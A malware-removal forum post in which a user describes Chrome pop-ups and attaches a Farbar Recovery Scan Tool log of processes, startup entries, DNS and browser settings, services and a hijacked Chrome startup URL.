Solved I believe I have malware on my computer.

[shivmister]

I have this issue when I am using chrome that I will periodically get a popup for random websites, now im getting pop ups saying that I have a virus. It has been an issue for atleast a month or so. I have tried to handle it by trying to run malware bytes. Malware bytes did detect some 38 items which I had already removed. The problem still persists. I did run malware bytes before I came across this forum. I have attached the 2 logs below. Please help me. Thank you!

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:04-10-2015
Ran by 007 (administrator) on SHIVANG (03-03-2017 16:52:14)
Running from C:\Users\007\Desktop
Loaded Profiles: 007 (Available Profiles: 007)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmService.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyConfigTDPService.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyCriticalService.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvUIService.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\NLSSRV32.EXE
(Nitro PDF Software) C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
(PointGrab LTD) C:\Program Files (x86)\Lenovo\Motion Control\PGService.exe
(Lenovo) C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionPusher.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Lenovo) C:\ProgramData\LenovoTransition\Server\x64\ymc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Hewlett-Packard) C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe
Failed to access process -> Memory Compression
(Examsoft Worldwide Inc.) C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.SoftShield.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.7.0_x64__8wekyb3d8bbwe\Microsoft.StickyNotes.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmServiceHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek semiconductor) C:\Windows\RTFTrack.exe
() C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe
(Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe
() C:\Program Files (x86)\Lenovo\Lenovo Transition\TransitionServer.exe
(Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\utility.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Yoga Picks\Yoga Picks.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvTrayLoad.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvController.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe [111976 2013-08-02] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13653208 2013-09-12] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-30] (Realtek Semiconductor)
HKLM\...\Run: [RtsFT] => C:\WINDOWS\RTFTrack.exe [6340312 2013-07-19] (Realtek semiconductor)
HKLM\...\Run: [IgfxTray] => C:\windows\system32\igfxtray.exe [401896 2016-11-01] ()
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [Yoga PhoneCompanion] => C:\Program Files\Lenovo Yoga PhoneCompanion\Yoga Phone Companion.exe [844304 2013-10-26] (Lenovo)
HKLM\...\Run: [AutoStartTransition] => C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe [294672 2013-10-26] ()
HKLM\...\Run: [Energy Manager] => C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe [59925488 2013-10-26] (Lenovo(beijing) Limited)
HKLM\...\Run: [Lenovo Utility] => C:\Program Files (x86)\Lenovo\Energy Manager\Utility.exe [80880 2013-10-26] (Lenovo(beijing) Limited)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-06-03] (Synaptics Incorporated)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-24] (Microsoft Corporation)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-11-01] (Apple Inc.)
HKLM-x32\...\Run: [Lenovo App Shop] => C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismagent.exe [156000 2013-07-18] (Intel Corporation)
HKLM-x32\...\Run: [Yoga Picks] => C:\Program Files (x86)\Lenovo\Yoga Picks\Yoga Picks.exe [90640 2013-07-09] (Lenovo)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [AirDroid 3] => C:\Program Files (x86)\AirDroid\AirDroid.exe [8696832 2016-08-04] (Sand Studio)
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1116504 2017-02-01] (Google Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
Startup: C:\Users\007\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-11-07]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk [2015-11-07]
ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 8.8.8.8 8.8.4.4
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{0d251055-31ed-48ea-b574-65a04995c8e1}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}: [DhcpNameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{e5a2d9d9-828e-453f-8fae-e6e1988b15eb}: [NameServer] 8.8.8.8,8.8.4.4

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo13.msn.com/?pc=LCJB
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://home.lenovo.com
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://home.lenovo.com
SearchScopes: HKLM -> DefaultScope {DA333138-ED30-42B1-BFA9-F83C9197A11D} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2015-11-07] (LastPass)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-08-04] (Oracle Corporation)
BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll [2015-11-07] (LastPass)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-08-04] (Oracle Corporation)
Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2015-11-07] (LastPass)
Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll [2015-11-07] (LastPass)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-07-29] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2012-06-01] (Skype Technologies)
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\System32\tbauth.dll [2016-07-16] (Microsoft Corporation)
Handler-x32: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll [2016-07-16] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_221.dll [No File]
FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2015-11-07] (LastPass)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_221.dll [No File]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-08-08] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-08-08] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-08-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-08-04] (Oracle Corporation)
FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2015-11-07] (LastPass)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-12] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-11-08] (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 8\npnitromozilla.dll [2013-06-28] (Nitro PDF)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3283718265-1983809055-1317204610-1001: intel.com/AppUp -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp.dll [2013-07-18] (Intel)
FF Plugin HKU\S-1-5-21-3283718265-1983809055-1317204610-1001: intel.com/AppUpx64 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll [2013-07-18] (Intel)
FF Extension: Video DownloadHelper - C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-01-02]
FF Extension: Adblock Plus - C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-01-02]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2017-01-22]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/ig
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggQcVwABFtEGBhAcgEITA1AQwwOeA4OBRRDRQxCJgBcVlhBRAwFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEgVFxAK3JWDk4="
CHR StartupUrls: Default -> "hxxp://www.google.com/ig","hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggQcVwABFtEGBhAcgEITA1AQwwOeA4OBRRDRQxCJgBcVlhBRAwFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEgVFxAK3JWDk4="
CHR Profile: C:\Users\007\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-07]
CHR Extension: (Google Docs) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-07]
CHR Extension: (Google Drive) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-07]
CHR Extension: (Shortcuts for Google™) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\baohinapilmkigilbbbcccncoljkdpnd [2017-01-26]
CHR Extension: (YouTube) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-07]
CHR Extension: (Google Cast) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2015-11-10]
CHR Extension: (Adblock Plus) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-11-07]
CHR Extension: (Pushbullet) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\chlffgpmiacpedhhbkiomidkjlcfhogd [2015-11-07]
CHR Extension: (Videostream for Google Chromecast™) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnciopoikihiagdjbjpnocolokfelagl [2015-11-07]
CHR Extension: (Google Search) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-07]
CHR Extension: (Google Calendar) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-11-07]
CHR Extension: (Google Sheets) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-07]
CHR Extension: (Google Docs Offline) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-07]
CHR Extension: (AdBlock) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-11-07]
CHR Extension: (TinEye Reverse Image Search) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\haebnnbpedcbhciplfhjjkbafijpncjl [2015-11-07]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-01-22]
CHR Extension: (IE Tab) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hehijbfgiekmjfkfjpbkbammjbdenadd [2015-11-07]
CHR Extension: (feedly) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipbfijinpcgfogaopmgehiegacbhmob [2016-06-13]
CHR Extension: (goo.gl URL Shortener) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\iblijlcdoidgdpfknkckljiocdbnlagk [2015-11-07]
CHR Extension: (Google Play Music) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\icppfcnhkcmnfdhfhphakoifcfokfdhg [2015-11-07]
CHR Extension: (Google Maps) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-11-07]
CHR Extension: (RSS Subscription Extension (by Google)) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbjncdgjeocebhnmkbbbdekmmmcbfjd [2015-11-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-07]
CHR Extension: (Remote Torrent Adder) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\oabphaconndgibllomdcjbfdghcmenci [2015-11-07]
CHR Extension: (Gmail) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-07]
CHR Extension: (Chrome Media Router) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-08-02]
CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [433688 2016-01-07] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [413208 2016-01-07] (BlueStack Systems, Inc.)
S3 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [859672 2016-01-07] (BlueStack Systems, Inc.)
S2 CDPUserSvc; C:\Windows\System32\CDPUserSvc.dll [339456 2016-11-11] (Microsoft Corporation)
R2 CDPUserSvc_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 CDPUserSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [3042032 2017-01-17] (Microsoft Corporation)
S4 DACoreService; C:\Program Files (x86)\Nuance\Dragon Assistant\Core\DACore.exe [432528 2013-05-02] (Nuance Communications, Inc.)
R2 DptfParticipantProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [115632 2013-08-02] (Intel Corporation)
R2 DptfPolicyConfigTDPService; C:\Windows\system32\DptfPolicyConfigTDPService.exe [116656 2013-08-02] (Intel Corporation)
R2 DptfPolicyCriticalService; C:\Windows\system32\DptfPolicyCriticalService.exe [148688 2013-08-02] (Intel Corporation)
R2 DptfPolicyLpmService; C:\Windows\system32\DptfPolicyLpmService.exe [124880 2013-08-02] (Intel Corporation)
S3 FrameServer; C:\Windows\system32\FrameServer.dll [805888 2016-11-02] (Microsoft Corporation)
S3 HvHost; C:\Windows\System32\hvhostsvc.dll [67584 2016-07-16] (Microsoft Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [373744 2016-11-01] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel(R) Corporation)
R2 Intel(R) Wireless Bluetooth(R) 4.0 Radio Management; C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe [155448 2013-09-20] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-08-08] (Intel Corporation)
